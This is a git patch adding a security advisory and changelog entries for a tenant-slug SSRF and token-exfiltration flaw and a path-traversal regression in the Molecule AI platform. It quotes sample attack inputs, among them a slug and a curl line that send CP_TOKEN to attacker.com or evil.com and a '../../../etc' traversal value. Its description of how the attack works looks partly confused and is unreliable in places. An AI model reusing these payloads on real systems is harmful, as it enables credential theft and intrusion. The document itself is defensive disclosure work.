From 6971ef23aaf294b9d95825ac69999554a8094236 Mon Sep 17 00:00:00 2001
From: Molecule AI Technical Writer <technical-writer@agents.moleculesai.app>
Date: Thu, 14 May 2026 06:43:52 +0000
Subject: [PATCH] docs(security): add OFFSEC-006 advisory doc + link from
 Security Changelog

New advisory: content/docs/security/offsec-006-slug-ssrf-advisory.mdx
Covers CWE-918 SSRF + CWE-20 token exfiltration in promote-tenant-image.sh
(molecule-core#933), with vulnerability details, mitigations, and upgrade
instructions for self-hosted operators.

Also updates security/index.mdx with OFFSEC-006 entry and adds "Full
advisory" link in the 2026-05-14 changelog entry.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
---
 content/docs/security/changelog.md            | 48 +++++++++++
 content/docs/security/index.mdx               |  2 +
 .../offsec-006-slug-ssrf-advisory.mdx         | 82 +++++++++++++++++++
 3 files changed, 132 insertions(+)
 create mode 100644 content/docs/security/offsec-006-slug-ssrf-advisory.mdx

diff --git a/content/docs/security/changelog.md b/content/docs/security/changelog.md
index e3d6990..67da711 100644
--- a/content/docs/security/changelog.md
+++ b/content/docs/security/changelog.md
@@ -9,6 +9,54 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
 
 ---
 
+## 2026-05-14 — OFFSEC-006: Tenant Slug SSRF + Token Exfiltration in `promote-tenant-image.sh`
+
+**Severity:** High (CWE-918 SSRF + CWE-20 Input Validation)
+**PR:** [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933)
+**Affected:** `scripts/promote-tenant-image.sh` — tenant slug interpolation into URLs and ECR identifiers
+**Full advisory:** [OFFSEC-006: Tenant Slug SSRF + Token Exfiltration](/docs/security/offsec-006-slug-ssrf-advisory)
+
+### Vulnerability
+
+Tenant slugs were interpolated directly into URL paths (`cp_redeploy_tenant`, `tenant_buildinfo`, `tenant_health`, `resolve_tenant_instance_id`) and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could be passed to `promote-tenant-image.sh`, causing:
+1. **SSRF** — the slug injected as a URL authority or path segment, redirecting the platform's HTTP call to an attacker-controlled host.
+2. **Token exfiltration** — `curl ?url=https://evil.com&token=$CP_TOKEN` causes the platform's bearer token to appear in the attacker-controlled server's access logs.
+
+Additionally, bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion, allowing a slug like `evil?url=https://attacker.com` to expand to a list of filenames before being passed to curl.
+
+### Fix
+
+Two-layer defence:
+
+1. **`set -f`** (line 57): disables glob expansion before any slug is used, so `*`, `?`, and `[` are treated as literal characters.
+2. **`validate_slug()`** (new function): RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) rejects any slug that does not match the tenant naming standard before any network call is issued. Invalid slugs exit with code 64.
+
+### User-facing summary
+
+Tenant promotion scripts now validate all tenant slug values against RFC-1123 before making any HTTP call or referencing the slug in an ECR identifier. Malformed slugs are rejected immediately with a descriptive error.
+
+---
+
+## 2026-05-13 — CWE-22: Path Traversal Regression in `org_import.go`
+
+**Severity:** High (CWE-22)
+**PR:** [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pull/810)
+**Affected:** `org_import.go` — `createWorkspaceTree`
+
+### Vulnerability
+
+A regression removed the `resolveInsideRoot` path-traversal guard from `createWorkspaceTree`. A malicious org YAML with `filesDir: "../../../etc"` could read arbitrary server files through the org template import path.
+
+### Fix
+
+Replaced unprotected `parseEnvFile` calls with `loadWorkspaceEnv` which applies `resolveInsideRoot` validation before accessing any path.
+
+### User-facing summary
+
+Org template imports now correctly validate all file paths before accessing them. Attempts to traverse outside the workspace root are rejected.
+
+---
+
 ## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
 
 **Severity:** High (CWE-22)
diff --git a/content/docs/security/index.mdx b/content/docs/security/index.mdx
index d9b79e8..913ba44 100644
--- a/content/docs/security/index.mdx
+++ b/content/docs/security/index.mdx
@@ -5,5 +5,7 @@ description: Security guides, advisories, and coverage reports for the Molecule
 
 ## In this section
 
+- [OFFSEC-006: Tenant Slug SSRF + Token Exfiltration (2026-05-14)](/docs/security/offsec-006-slug-ssrf-advisory) —
+  HIGH severity — SSRF and bearer-token exfiltration via unsanitised tenant slug in self-hosted deployment scripts
 - [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
   Three HIGH-severity findings for self-hosted operators
diff --git a/content/docs/security/offsec-006-slug-ssrf-advisory.mdx b/content/docs/security/offsec-006-slug-ssrf-advisory.mdx
new file mode 100644
index 0000000..587ba31
--- /dev/null
+++ b/content/docs/security/offsec-006-slug-ssrf-advisory.mdx
@@ -0,0 +1,82 @@
+---
+title: "OFFSEC-006: Tenant Slug SSRF + Token Exfiltration (2026-05-14)"
+description: High-severity SSRF and bearer-token exfiltration via unsanitised tenant slug interpolation in self-hosted deployment scripts.
+---
+
+## Advisory overview
+
+**Severity:** HIGH
+**CWE:** [CWE-918](https://cwe.mitre.org/data/definitions/918.html) (SSRF) + [CWE-20](https://cwe.mitre.edu/data/definitions/20.html) (Improper Input Validation)
+**Affected file:** `scripts/promote-tenant-image.sh`
+**Affected versions:** All self-hosted deployments prior to the fix in `molecule-core` PR [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933)
+**Fixed in:** `molecule-core` #933 (2026-05-14)
+**SaaS impact:** None — the platform applies the fix server-side
+
+This advisory documents a high-severity Server-Side Request Forgery (SSRF) and bearer-token exfiltration vulnerability in the tenant promotion script used by self-hosted operators.
+
+---
+
+## Vulnerability details
+
+Tenant slugs were interpolated directly into URL paths and ECR repository identifiers without any sanitisation.
+
+### Affected code pattern
+
+```bash
+# Vulnerable — slug inserted into URL path unchecked
+SLUG="?url=https://attacker.com"
+curl "${PLATFORM_URL}/cp_redeploy_tenant/${SLUG}"  # SSRF
+curl "?url=https://evil.com&token=${CP_TOKEN}"      # Token exfiltration
+```
+
+A malicious tenant slug such as `?url=https://attacker.com&token=$CP_TOKEN` passed to `promote-tenant-image.sh` could cause the platform to:
+
+1. **SSRF** — redirect HTTP calls to an attacker-controlled host by injecting a URL parameter
+2. **Bearer-token exfiltration** — the platform's `CP_TOKEN` appears in the attacker's server access logs via the same URL parameter injection
+
+### Secondary attack: glob expansion
+
+Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion, allowing a slug like `evil?url=https://attacker.com` to expand to a list of filenames before being passed to curl.
+
+---
+
+## Recommended mitigations
+
+### Upgrade (self-hosted operators)
+
+If you are running a self-hosted control plane, upgrade to the latest `molecule-core` build that includes `molecule-core` PR [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933).
+
+After upgrading, tenant slugs are validated against RFC-1123 before any network call:
+
+```bash
+# Invalid slugs are rejected with exit code 64
+$ ./promote-tenant-image.sh "?url=https://evil.com"
+Error: invalid tenant slug "?url=https://evil.com" — must match ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$
+```
+
+### If you cannot upgrade immediately
+
+Audit your tenant slugs manually. Any slug containing the characters `?`, `#`, `&`, `$`, `/`, `\`, or spaces is a potential exploit vector. Rename affected tenants with clean slugs matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`.
+
+---
+
+## Fix summary
+
+Two-layer defence applied in `scripts/promote-tenant-image.sh`:
+
+1. **`set -f`** (line 57): disables glob expansion before any slug is used, so `*`, `?`, and `[` are treated as literal characters.
+2. **`validate_slug()`**: new function using RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Rejects non-conforming slugs with exit code 64 before any network call is issued.
+
+---
+
+## Credit
+
+Found and fixed by the Molecule AI security team during internal code review.
+
+---
+
+## Related advisories
+
+- [SAFE-MCP Security Advisory](./safe-mcp-advisory.mdx) — April 2026 audit findings (G-01 through G-03)
+- [Security Changelog](./changelog.md) — full history of security fixes
+- [OWASP Agentic Top 10](./owasp-agentic-top-10.mdx) — risk framework reference